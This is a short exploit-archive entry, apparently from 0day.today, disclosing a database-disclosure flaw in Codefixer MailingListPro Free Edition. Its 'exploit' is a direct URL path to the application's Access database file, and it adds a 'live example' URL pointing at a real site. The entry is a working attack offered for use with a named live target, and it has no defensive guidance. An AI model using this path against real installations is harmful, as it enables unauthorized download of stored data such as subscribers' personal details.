id: 4337
date: 12/02/2008
title: Codefixer MailingListPro (MailingList.mdb) Database Disclosure Vuln
author: AlpHaNiX
cves: 

===================================================================
Codefixer MailingListPro (MailingList.mdb) Database Disclosure Vuln
===================================================================



###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################



----------------------------------------------------------




#found by : OffensiveTrack
#Author   : AlpHaNiX

###########################################################################



#script   : MailingListPro
#version  : FreeEdition
#download : http://www.codefixersoftware.com/downloads/mailinglist.zip



#Exploit :
http://target.com/db/MailingList.mdb


#live example :
http://www.codefixer.com/mailingList/db/MailingList.mdb



#  0day.today [2023-03-25]  #